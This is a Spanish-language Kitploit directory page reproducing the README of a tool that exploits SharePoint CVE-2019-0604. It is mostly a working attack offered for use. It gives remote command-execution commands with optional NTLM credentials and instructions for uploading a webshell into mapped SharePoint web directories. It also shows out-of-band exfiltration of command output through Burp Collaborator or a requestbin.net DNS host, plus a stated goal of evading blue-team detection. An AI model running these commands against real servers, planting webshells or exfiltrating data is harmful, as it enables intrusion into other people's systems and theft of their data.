Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
weaponized-0604 — Herramienta automatizada para explotar sharepoint CVE-2019-0604 | Kitploit
Herramientas/GitHubGitHub/gh0st0ne/weaponized-0604
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Herramienta automatizada para explotar sharepoint CVE-2019-0604

Ver Repositorio
8hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-0604 armado

Herramienta de explotación automatizada para maximizar CVE-2019-0604.

Requisito

El archivo requirements.txt debe listar todas las bibliotecas de Python que esta herramienta usa, y se instalarán usando

root@kitploit:~
$ pip install -r requirements.txt

Explotación manual a ciegas (con/sin credenciales)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Función de subida

sube cualquier cosa interesante (webshell, herramienta de reconocimiento ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Mapeo de directorios

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

Usar OOB para obtener el resultado del comando

Con la extensión de Burp collaborator_http_api

  1. Instala collaborator_http_api.py en BurpSuite (Pro)?
  2. Asegúrate de que BurpSuite se ejecute en la misma máquina que este exploit.
  3. Dispara, disfruta de la salida recuperada :)
root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

Con DNSLog, p. ej., requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Obtener datos del DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

Decodifícalo tú mismo :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

Por hacer

  • Analizador de argumentos
  • SharePoint, CVE-2019-0604
  • dividir cmd en múltiples partes (en args.cmds)
  • especificar binario bajo demanda, evitando la detección por el equipo azul. (cmd.exe hardcodeado actualmente)

Autor

  • Tree
Descargar herramienta